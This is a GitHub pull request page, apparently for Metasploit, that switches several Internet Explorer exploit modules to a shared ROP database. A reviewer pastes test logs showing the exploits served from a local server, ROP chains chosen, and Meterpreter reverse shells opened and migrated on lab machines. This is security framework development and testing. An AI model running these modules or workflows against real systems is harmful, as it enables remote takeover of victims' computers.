New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Ropdb for some existing browser exploits #862
Merged
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I don't think is related to this pull request, but msftidy complains of ie_execcommand_uaf.rb, we could use this pull request to fix it: modules/exploits/windows/browser/ie_execcommand_uaf.rb ... bad indent: 1 274: "\t\t </script>\n"- Eyeballed and looks good Tested successfully with some of them just to have proof of working:
msf > use exploit/windows/browser/ie_execcommand_uaf msf exploit(ie_execcommand_uaf) > rexploit [*] Reloading module... [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.128:4444 [*] Using URL: http://0.0.0.0:8080/c4WIgSDC19Y9 [*] Local IP: http://192.168.1.128:8080/c4WIgSDC19Y9 [*] Server started. msf exploit(ie_execcommand_uaf) > [*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) [*] 192.168.1.128 ie_execcommand_uaf - Redirecting to kDYIV.html [*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) [*] 192.168.1.128 ie_execcommand_uaf - Loading kDYIV.html [*] 192.168.1.128 ie_execcommand_uaf - Using JRE ROP [*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) [*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) [*] 192.168.1.128 ie_execcommand_uaf - Loading JzNMrq.html [*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) [*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) [*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) [*] 192.168.1.128 ie_execcommand_uaf - Loading JzNMrq.html [*] 192.168.1.128 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) [*] Sending stage (752128 bytes) to 192.168.1.128 [*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.128:55845) at 2012-10-05 21:39:49 +0200 [*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.128:55845) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (2744) [*] Spawning notepad.exe process to migrate to msf exploit(ie_execcommand_uaf) > [+] Migrating to 3404 msf exploit(ie_execcommand_uaf) > [+] Successfully migrated to process [*] 192.168.172.143 - Meterpreter session 1 closed. Reason: Died *ie_execcommand_uaf with msvcrt rop chain rmsf exploit(ie_execcommand_uaf) > rexploit [*] Reloading module... [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.128:4444 [*] Using URL: http://0.0.0.0:8080/bIgfChSJXv [*] Local IP: http://192.168.1.128:8080/bIgfChSJXv [*] Server started. msf exploit(ie_execcommand_uaf) > [*] 192.168.1.152 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) [*] 192.168.1.152 ie_execcommand_uaf - Redirecting to anKOa.html [*] 192.168.1.152 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) [*] 192.168.1.152 ie_execcommand_uaf - Loading anKOa.html [*] 192.168.1.152 ie_execcommand_uaf - Using msvcrt ROP [*] 192.168.1.152 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) [*] 192.168.1.152 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) [*] 192.168.1.152 ie_execcommand_uaf - Loading bORWJq.html [*] 192.168.1.152 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) [*] Sending stage (752128 bytes) to 192.168.1.152 [*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.152:1782) at 2012-10-05 21:43:30 +0200 [*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.152:1782) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1624) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3568 [+] Successfully migrated to process
msf exploit(ms12_037_same_id) > rexploit [*] Reloading module... [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.128:4444 [*] Using URL: http://0.0.0.0:8080/UTGFuxxagAU [*] Local IP: http://192.168.1.128:8080/UTGFuxxagAU [*] Server started. msf exploit(ms12_037_same_id) > [*] 192.168.1.152 ms12_037_same_id - Client requesting: /UTGFuxxagAU [*] 192.168.1.152 ms12_037_same_id - Using msvcrt ROP [*] 192.168.1.152 ms12_037_same_id - Sending html [*] Sending stage (752128 bytes) to 192.168.1.152 [*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.152:1853) at 2012-10-05 21:47:11 +0200 [*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.152:1853) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1600) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3560 [+] Successfully migrated to process
msf exploit(msxml_get_definition_code_exec) > rexploit [*] Reloading module... [*] Exploit running as background job. [-] Handler failed to bind to 192.168.1.128:4444 [*] Started reverse handler on 0.0.0.0:4444 [*] Using URL: http://0.0.0.0:8080/Xwngfl7B7UgEKO2 [*] Local IP: http://192.168.1.128:8080/Xwngfl7B7UgEKO2 [*] Server started. msf exploit(msxml_get_definition_code_exec) > [*] 192.168.1.152 msxml_get_definition_code_exec - Using msvcrt ROP [*] 192.168.1.152 msxml_get_definition_code_exec - 192.168.1.152:1863 - Sending html [*] Sending stage (752128 bytes) to 192.168.1.152 [*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.152:1864) at 2012-10-05 21:48:41 +0200 [*] Session ID 4 (192.168.1.128:4444 -> 192.168.1.152:1864) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (3680) [*] Spawning notepad.exe process to migrate to [+] Migrating to 2644 [+] Successfully migrated to process |
Testing looks good, I'll just merge this. Thanks. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Use RopDb for some existing recent browser exploits.